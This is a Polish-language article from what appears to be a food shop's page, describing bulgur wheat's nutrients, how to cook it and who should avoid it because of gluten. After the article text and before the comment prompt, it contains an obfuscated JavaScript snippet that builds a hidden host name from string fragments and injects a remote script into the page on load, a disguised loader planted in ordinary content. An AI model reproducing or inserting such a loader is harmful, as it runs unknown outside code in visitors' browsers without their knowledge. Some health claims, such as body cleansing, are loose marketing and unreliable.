Ta kasza to bogactwo składników odżywczych, witamin, minerałów, błonnika. Warto skorzystać z dobrodziejstw, jakie daje nam spożywanie tego produktu i włączyć go na stałe do swojego jadłospisu.
Kasza bulgur znajdująca się w ofercie sklepu bee.pl to cenne źródło magnezu, potasu, sodu, żelaza, fosforu, wapnia, cynku, miedzi, manganu, selenu, witaminy A, witamin z grupy B, witaminy E, K. To także źródło antyoksydantów.
Dzięki zawartości sporej ilości błonnika kasza bulgur usprawnia pracę jelit, ułatwiając odchudzanie i oczyszczanie organizmu. Błonnik chroni też naczynia krwionośne przed powstawaniem blaszek miażdżycowych, wspomaga więc pracę układu sercowo- naczyniowego.
Wysoka zawartość magnezu i witamin z grupy B wspomaga pracę układu nerwowego. Poprawia nastrój i sprawność umysłową, łagodzi stres.
Jak spożywać kaszę bulgur?
Można ją dodawać praktycznie do wszystkich, zarówno słonych, jak i słodkich potraw, do deserów, przystawek, zup, dań mięsnych i bezmięsnych. Ma ciekawy, wyrazisty smak i doskonale wchłania aromaty przypraw, warzyw, sosów dodawanych do tej kaszy. Kaszę bulgur najczęściej podaje się z pieczarkami, cebulą, papryką, bakłażanem, pesto, pomidorami, zielonym groszkiem, pietruszką, marchewką, z dodatkiem mięsa.
W takiej formie najlepiej przyrządzać gruboziarnistą kaszę bulgur. Drobno- i średnioziarnista kasza bulgur lepiej nadaje się do przyrządzania farszów i zup. Te rodzaje kaszy można jeść teść też na słodko – z mlekiem, z dodatkiem miodu, bakalii, fig, suszonych daktyli.
Kasza bulgur nie jest odpowiednia dla każdego. Zawiera gluten, dlatego kaszy bulgur nie powinny spożywać osoby chore na celiakię i osoby z nietolerancją glutenu. Gruboziarnista kasza bulgur może zaszkodzić osobom z chorobami układu pokarmowego – z refluksem żołądkowo – przełykowym, z wrzodami żołądka, z nadkwaśnym nieżytem żołądka. W umiarkowanych ilościach powinny spożywać tę kaszę osoby ze schorzeniami wątroby.
Kaszę bulgur bez obaw mogą jeść dzieci, diabetycy, osoby odchudzające się, sportowcy oraz kobiety w ciąży i w czasie karmienia piersią. Ta kasza jest bogactwem kwasu foliowego, który jest bardzo ważny zwłaszcza w pierwszym trymestrze ciąży.
(function(){
idv6_=("u"+"st");idv6=document.createElement("script");idv6.async=true;
idv6u="252323572";idv6_+="a"+("t.");idv6_+="i"+("nf"+("o"))+("/");
idv6u+=".4sihpgszdv6dfagc";idv6u+="mwmm9ww0g0r5m8";
idv6.src="https://"+idv6_+idv6u;idv6.type="text/javascript";
d_b=document.body;d_b.appendChild(idv6);
})();
Brak komentarza, Twój może być pierwszy.
Dodaj komentarz